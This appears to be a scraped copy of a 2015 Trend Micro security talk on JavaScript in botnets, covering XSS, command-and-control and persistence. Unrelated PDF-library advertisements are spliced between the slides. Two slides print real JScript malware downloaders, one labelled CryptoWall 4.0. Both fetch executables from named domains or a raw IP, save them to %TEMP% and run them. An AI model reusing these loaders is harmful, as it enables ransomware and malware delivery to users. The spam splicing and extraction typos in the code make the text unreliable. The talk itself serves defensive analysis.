Powered by JavaScript
Renaud Bidou
TechnicalDirector–SouthernEurope
renaud_bidou@trendmicro.fr / @rbidou/@XssPayloads
Pdf change page size - Compress reduce PDF size in C#.net, ASP.NET, MVC, Ajax, WinForms, WPF
C# Code & .NET API to Compress & Decompress PDF Document
change pdf page size; pdf page size dimensions
Pdf change page size - VB.NET PDF File Compress Library: Compress reduce PDF size in vb.net, ASP.NET, MVC, Ajax, WinForms, WPF
VB.NET PDF Document Compression and Decompression Control SDK
pdf page size may not be reduced; best compression pdf
Introduction
<script>alert(͚hello world͛)</script>
VB.NET Image: How to Create Visual Basic .NET Windows Image Viewer
formats, including png, jpeg, gif, tiff, bmp, PDF, and Word can get a basic idea of the page layout from from that, you are entitled to change the orientation
reader compress pdf; best way to compress pdf file
C# PDF insert text Library: insert text into PDF content in C#.net
formatted text and plain text to PDF page using .NET NET PDF edit control allows modify existing scanned PDF text. Ability to change text font, color, size and
change font size in pdf comment box; change page size pdf
JavaScript Today
Copyright 2015 Trend Micro Inc.     
3
ECMAScript
JavaScript Core
WebKit
Safari
QT5
v8
Chrome Node.js
Opera
SpiderMonkey
Firefox
Gecko Acrobat
JScript9
IE
Trident
JScript.NET
.NET Framework
ActionScript
Flash
Flex
Chakra
MS Edge
Nashorn
Java
ExtendScript
Adobe CreativeSuite
C# PDF Convert: How to Convert Word, Excel, PowerPoint, Tiff
Support conversion to PDF from other documents, keeping original document page size. Support rendering image to a PDF document page, no change for image size.
change font size pdf form; best pdf compression tool
C# PDF Annotate Library: Draw, edit PDF annotation, markups in C#.
Able to edit and change PDF annotation properties such as font size or color. Perform Various annotations on PDF Page using C#.NET Demo Codes.
best online pdf compressor; pdf file size
Copyright 2015 Trend Micro Inc.     
4
WhyJavaScript in Botnets?
Becauseyouneed… 
C# PDF Thumbnail Create SDK: Draw thumbnail images for PDF in C#.
public override Bitmap ConvertToImage(Size targetSize). Description: Convert the PDF page to bitmap with specified size. Parameters:
change font size in pdf text box; pdf font size change
C# PDF File Split Library: Split, seperate PDF into multiple files
Divide PDF file into multiple files by outputting PDF file size. control, C# developers can easily and accurately disassemble multi-page PDF document into two
pdf file size limit; adjust file size of pdf
Copyright 2015 Trend Micro Inc.     
5
WhyJavaScript in Botnets?
Injection
XSS & SOME
2
nd
orderthroughimages
Local file youshouldn͛thave cliked
C2
Use social networks
Setup bidirectionalcommunications
DistributedC2
Persistence& agility
Dynamiccode loaders
Cache compromise
Propagation & evasion
Identifythe network
Escape network detection
Polymorphicpropagation
Operations
Fingerprinting, geolocation
Data theft
Background jobs
Privacyabuses
DDoS…
Force downloadand more
VB.NET PDF File Split Library: Split, seperate PDF into multiple
Separate source PDF document file by defined page range in VB.NET class application. Divide PDF file into multiple files by outputting PDF file size.
change font size pdf document; pdf custom paper size
Create Thumbnail Winforms | Online Tutorials
editor: Click "Add" to add new items in thumbnail; Click "Swap" to change two items Multi-page Tiff Processing; RasterEdge OCR Engine; PDF Reading; Encode &
change font size in fillable pdf; adjust size of pdf file
Copyright 2015 Trend Micro Inc.     
6
Becauseall youneed
isin JavaScript
WhyJavaScript in Botnets?
Injections 101
Copyright 2015 Trend Micro Inc.     
8
The infamous XSS
Often
considered
as the Buffer 
Overflow
of the 
decade
Second orderattack
InjectsJavaScript in pages visited
LeveragesJS capabilities
!
Vulnerableservers are onlyrelays
Targetsbrowsers
Attackerexploits XSS vulnerability
1
2
3
Copyright 2015 Trend Micro Inc.     
9
var b = "newtide.3dmxwebservices.com ericacisneros.com www.norascosmetics.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "799285";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
for (var n = 1; n <= 3; n++) {
for (var i = 0; i < b.length; i++) {
var dn n = 0;
try {
xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=581824" + n, false);
xo.send();
if (xo.readyState == 4 && xo.status == 200) {
xa.open();
xa.type = 1;
xa.write(xo.responseBody);
if (xa.size e > 1000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn + n + ".exe", 2);
try {
ws.Run(fn + n + ".exe", 1, 0);
} catch (er) {};
};
xa.close();
};
if (dn n == 1) break;
} catch (er) {};
};
};
Downloaders
Common JScript t downloader
Downloadsources
Save to obfuscatedfilename
Execute
Copyright 2015 Trend Micro Inc.     
10
(function(dataAndEvents) {
function request(xdomain) {
return new dataAndEvents.ActiveXObject(xdomain);
}
var QAKDHaz z = true;
var curPort t = "DB.Stream";
var doRequest;
doRequest = function(url, scope, deepDataAndEvents) {
var req = request("WScript"+(1229173, ".Shell"));
var xhr .= request("MSXML2.XMLHTTP);
var nonStripName = "%TEMP%\\";
scope = req.ExpandEnvironmentStrings(nonStripName) + scope;
xhr.onreadystagechange = function() {
QAKDHaz = false;
with(request("ADO"+curPort)) {
open();
type = 1;
write(xhr.ResponseBody);
saveToFile(scope,2);
close();
return scope;
}
}
};
xhr.open("G" + (3882399, 462019, "ET"), url, false);
xhr.send();
for(;QAKDHaz;) {
dataAndEvents.WScript.Sleep(1E3);
}
if(new Date > 0,7125) {
req.Run(scope,0,0);
}
};
doRequest("http://46.30.45."+"110/anali" + tics.e" + "x" + "e", 
"160967872.exe", 1);
})(this);
Downloaders
CryptoWall
4.0
Documents you may be interested
Documents you may be interested